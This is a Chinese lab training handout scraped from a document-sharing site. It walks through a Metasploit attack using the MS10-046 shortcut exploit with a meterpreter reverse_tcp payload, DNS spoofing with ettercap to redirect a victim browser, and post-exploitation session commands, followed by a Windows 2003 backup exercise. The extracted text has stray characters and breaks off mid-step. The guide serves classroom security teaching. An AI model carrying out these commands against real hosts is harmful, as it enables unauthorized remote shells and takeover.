


下载本文档
版权说明:本文档由用户提供并上传,收益归属内容提供方,若内容存在侵权,请进行举报或认领
文档简介
1、无利用漏洞进行溢出攻击及数据备份利用漏洞进行溢出攻击及数据备份1.1. 实训目的实训目的( (后果自负后果自负) )利用系统漏洞进行溢出攻击是一种现今网络上常用的一种攻击手段,它利用 C 等高级语言对于数据、指针以及寄存器等保护不足及程序员在开发系统时的过错,通过多重手段屏蔽用户感知,从而获取用户所传递信息或者误导用户的网络应用操作。 本次练习主要目的是体验利用漏洞进行缓冲区溢出攻击。数据备份是系统管理员日常进行系统、数据维护所必需掌握的技巧及手段,本次练习应用 windows2003 自带的备份工具进行数据备份。2.2. 实训所需条件及环境实训所需条件及环境硬件设备:硬件设备:局域网(含机柜
2、、配线架、交换机等) 、台式 PC 机软件支撑:软件支撑:Windows 2003、Windows XP 以及 BackTract5 虚拟机网络拓扑结构:网络拓扑结构:3.3. 实训内容实训内容3.13.1 利用利用 metasploitmetasploit 进行溢出攻击练习进行溢出攻击练习使用 metasploit 开启攻击无首先是进入 Metasploit。可以点击【应用程序】【BackTrack】【Exploitation Tools】【Network Exploitation Tools】【Metasploit Framewrok】进入 Metasploit 外,也可以在图形界面下打开
3、任意一个终端, 直接输入 msfconsole 命令来进入 Metasploit。此时可以看到当前包含代码数量、参数状态及最新版本等,如下图所示,进入 msf 的工作平台后,输入 search ms10-046 查询攻击代码的存放路径, 即可看到名为ms10_046_shortcut_icon_dllloader的相关信息。接下来,使用如下指令载入攻击代码:Use windows/browser/ms10_046_shortcut_icon_dllloader回车后如下图所示,表示载入攻击代码成功。此时,可以通过 showoptions 来查看可以(必需)进行的参数配置。无在了解需进行的攻击参
4、数的配置后,接下来就可以使用 set 命令来依次配置参数。其中,还需设置 PAYLOAD 为获取 windows 的 shellcode,即 windows/metepreter/reverse_tcp。此外,由于后面攻击还要使用 ettercap 对目标进行 DNS 欺骗攻击,所以要将反弹端口的目的地设置为自身 IP,即设置 LHOST 为自身 IP。具体命令如下:setSRVHOST攻击者自身 IPsetPAYLOADwindows/meterpreter/reverse_tcpsetLHOST攻击者自身 IPexploit无进行 dns 欺骗攻击参照在欺骗攻击练习中的操作叙述及练习视频的
5、说明,完成对etter.dns 的配置。注意这里域名对应的 ip 地址必需根据自己的机器的实际 ip 地址进行。完成域名的配置后,使用 ifconfig 查看使用的网络适配器的符号,然后发起欺骗攻击,如下图所示。无入侵目标主机目标主机 (Windows XP) 上打开浏览器, 输入网址 http:/www.xxx并回车,会发现浏览器的响应会变得缓慢。稍等数秒后,会发现在目标主机上的浏览器上原本应显示为 www.xxx 的主页, 突然变成了一个名为30XHJnSkKNjR 的共享目录。如下图所示。打开攻击主机 BackTrack5 的 Metasploit 终端下, 会看
6、到目标主机因DNS 欺骗而导致的重定向访问,此时目标主机被强制运行了攻击主机即 30 上 Metasploit 执行的漏洞攻击代码。 于是在成功溢出后,攻击主机拿到了一个反向溢出 Shell。如下图所示,即可获无取到一个 Meterpreter Session(注意倒数第三行) 。此时,攻击者输入 back 命令回到 Metasploit 的根目录后,就可以使用 sessions 查看这个反向溢出 Shell 的 ID 号及其相关信息, 然后再调用该 ID 即可。具体命令如下:sessionssessions-i1参数解释:-i num 该参数用于调用不同 ID 号的成
7、功溢出 Shell,后跟的 num 为ID 号。无依次输入上述命令,就可以成功调用该反向溢出 Shell,此时会看到提示符从msf变成了meterpreter,如下图所示,此时键入 ps 即可看到目标主机所有运行的进程。攻击操作练习目标主机打开计算器,如下图所示,请你使用 linux 的 kill 指令将计算器的进程杀除。使用命令 run getgui e,看看能否开启目标主机的运程管理服务。3.23.2 挂马攻击练习挂马攻击练习无开启 windows2003,并运行 IIS 服务。然后使用如下指令,设计挂马网页。修改3.1中的dns 配置, 将域名对应的ip地址指向windows2003,并
8、重复 3.1 的整个攻击过程。看看在目标机器上,能否察觉被攻击机入侵的痕迹?3.33.3 数据备份练习数据备份练习实验环境准备启动 windows2003(以下简称主机) ,并配置 IIS 服务器。然后复制默认网站工作目录下的所有文件夹及其文件到“D:WebBackUp”目录下。文件状态查询主机查询备份前文件夹(即上面需要进行备份的 IIS 默认网站文件及文件夹)的状态(文件夹中文件数量、名称、大小),记录其状态为 S1。文件备份(1) 主机选择“开始-所有程序-附件-系统工具-备份”菜单项,弹出“备份或还原向导”对话框,单击“下一步”按钮。(2) 主机选择“备份文件和设置(A)”单选按钮,单
9、击“下一步”按钮。(3) 主机选择 “让我选择要备份的内容(L)” 单选按钮, 单击 “下无一步”按钮。(4) 主机选择备份项目为“D:WebBackUp” ,单击“下一步”按钮。(5) 主机选择备份文件的位置为 “D:” , 备份文件名称保持默认,单击“下一步”按钮。(6) 主机单击“完成”按钮,开始备份操作。(7) 稍等片刻后,完成备份操作。主机单击“关闭”按钮,关闭“备份进度”对话框。原始文件删除主机删除“D:WebBackUp”文件夹及其文件。文件还原(1) 主机双击“D:Backup.bkf”文件,弹出“备份或还原向导”对话框,单击“下一步”按钮。(2) 主机选择“还原文件和设置(R)”单选按钮,单击“下一步”按钮。(3) 主机勾选要还原的项目为“D:Backup.bkf”,
温馨提示
- 1. 本站所有资源如无特殊说明,都需要本地电脑安装OFFICE2007和PDF阅读器。图纸软件为CAD,CAXA,PROE,UG,SolidWorks等.压缩文件请下载最新的WinRAR软件解压。
- 2. 本站的文档不包含任何第三方提供的附件图纸等,如果需要附件,请联系上传者。文件的所有权益归上传用户所有。
- 3. 本站RAR压缩包中若带图纸,网页内容里面会有图纸预览,若没有图纸预览就没有图纸。
- 4. 未经权益所有人同意不得将文件中的内容挪作商业或盈利用途。
- 5. 人人文库网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对用户上传分享的文档内容本身不做任何修改或编辑,并不能对任何下载内容负责。
- 6. 下载文件中如有侵权或不适当内容,请与我们联系,我们立即纠正。
- 7. 本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。
最新文档
- 铁路乘务员化妆课件
- 2025年工程地质期末考试题含答案
- 情景模拟培训优化-洞察及研究
- 铁塔寺消防安全知识培训课件
- 数据生命周身份管理-洞察及研究
- 知识产权贯标外审培训课件
- unit3BLets talk课件2025-2026学年人教版英语四年级上册
- 知识产权网络培训简报课件
- 小学数学教学基本功课件
- 历史教学方法交流课件
- 园区招聘活动方案
- 罐式专用运输管理制度
- 产科危急重症管理制度
- 2025届上海市金山区高三下学期二模英语试题(解析版)
- 【生物 安徽版】2025年普通高等学校招生选择性考试(原卷版)
- 2025年《数字孪生与虚拟调试技术应用》课程标准
- T/CCS 033-2023煤矿智能化水处理系统建设技术规范
- GoodsFox-2025年全球电商营销趋势报告
- 2025年人造粉云母制品行业深度研究报告
- 医工交叉培养提升医疗人才的综合能力
- 以诺书999中英对照
评论
0/150
提交评论